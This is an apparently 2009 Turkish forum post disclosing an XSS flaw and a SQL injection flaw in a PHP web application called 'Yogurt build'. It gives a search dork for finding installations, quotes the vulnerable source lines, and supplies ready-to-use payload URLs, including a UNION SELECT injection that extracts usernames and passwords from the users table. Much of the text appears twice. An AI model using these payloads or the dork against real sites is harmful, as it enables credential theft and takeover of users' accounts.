bu açığa yoğurt açığı ismini verdimm.....
2009-06-11 tarhinde bulunmuştur...Dorkumuz : "Yogurt build" ve 2 tane açık XSS ve SQL
XSS açığı
index.php içinde...
ise XSS açığı vardır.....
SQL açığı
system/writemessage.php içinde
system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <--
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);
ise SQL injecyion açığı vardır...
GELELİM KODLARA....
EĞER AÇIKLAR MEVCUT İSE...KODLARIMIZ...
1.XSS için
2.SQL için
bi teşekkürü maruz görmeyin ...anlatım tamamen bana aittir.......
2009-06-11 tarhinde bulunmuştur...Dorkumuz : "Yogurt build" ve 2 tane açık XSS ve SQL
XSS açığı
index.php içinde...
Kod:
index.php:45: if(isset($_GET['msg']))
index.php:48: print("<center>". $_GET['msg'] . "</center>"); <--ise XSS açığı vardır.....
SQL açığı
system/writemessage.php içinde
system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <--
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);
ise SQL injecyion açığı vardır...
GELELİM KODLARA....
EĞER AÇIKLAR MEVCUT İSE...KODLARIMIZ...
1.XSS için
Kod:
http://localhost/xscripts/yogurt/index.php?msg=**********alert('br0ly')</script>2.SQL için
Kod:
http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--bi teşekkürü maruz görmeyin ...anlatım tamamen bana aittir.......
